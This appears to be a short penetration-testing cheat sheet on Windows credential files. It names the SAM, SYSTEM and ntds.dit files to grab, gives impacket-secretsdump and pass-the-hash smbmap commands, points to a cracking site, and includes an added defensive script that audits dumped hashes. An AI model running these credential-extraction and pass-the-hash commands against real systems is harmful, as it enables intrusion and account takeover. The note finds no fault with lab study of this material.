Windows files

Most Sensitive Files to Grab

C:\Windows\System32\config\

SAM

SYSTEM

ntds.dit (if on a Windows Domain Controller)

Extracting Hashes

impacket-secretsdump -sam SAM -system SYSTEM local

If you see these hashes, the password is blank (they are the LM and NT hashes of an empty string)

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

  • in this case it is likely that the Administrator account is disabled
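Added example, not part of the original notes: for an authorized password audit, this parses lines in the user:rid:lmhash:nthash::: format shown above and flags blank passwords, stored LM hashes and accounts that share one NT hash. Everything in SAMPLE except the Administrator line is constructed, and the function names are illustrative.

```python
from collections import defaultdict
import re

# Well-known LM and NT hashes of the empty string (the values shown above).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One account per line: user:rid:lmhash:nthash:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample; only the Administrator line comes from the notes above.
SAMPLE = f"""\
Administrator:500:{EMPTY_LM}:{EMPTY_NT}:::
Guest:501:{EMPTY_LM}:{EMPTY_NT}:::
svc_backup:1001:{EMPTY_LM}:0123456789abcdef0123456789abcdef:::
helpdesk:1002:{EMPTY_LM}:0123456789ABCDEF0123456789ABCDEF:::
legacy:1003:fedcba9876543210fedcba9876543210:00112233445566778899aabbccddeeff:::
[*] not an account line
"""

def parse_dump(text):
    """Parse hash lines into dicts; anything else (banners, blanks) is skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            accounts.append({"user": user, "rid": int(rid),
                             "lm": lm.lower(), "nt": nt.lower()})
    return accounts

def audit(accounts):
    """Group accounts by finding; hashes are compared, never cracked."""
    blank, lm_stored, by_nt = [], [], defaultdict(list)
    for a in accounts:
        if a["nt"] == EMPTY_NT:          # empty NT hash: no password set
            blank.append(a["user"])
            continue
        if a["lm"] != EMPTY_LM:          # a real LM hash is stored (weak format)
            lm_stored.append(a["user"])
        by_nt[a["nt"]].append(a["user"])
    shared = sorted(sorted(u) for u in by_nt.values() if len(u) > 1)
    return {"blank_password": blank, "lm_hash_stored": lm_stored,
            "shared_nt_hash": shared}

if __name__ == "__main__":
    for finding, users in audit(parse_dump(SAMPLE)).items():
        print(finding, users)
```

The empty LM value on an account with a non-empty NT hash only means no LM hash is stored, which is the expected state on current Windows versions.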

Pass the Hash

smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134

Crack the Hash

https://hashes.org

Config File Data

In Windows, config files for users are stored in AppData (C:\Users\<username>\AppData\Roaming\)

  • use dir /a to view the hidden AppData folder

Mounting a Windows File System

mount -t cifs //<IP address>/<share> <directory to mount it to (e.g. /mnt/smb)>

.vhd files

7z l <filename>

  • lists files

7z x <filename>

  • to extract

OR

guestmount --add <filename> --inspector --ro -v <directory to mount it to>

  • mounting a vhd
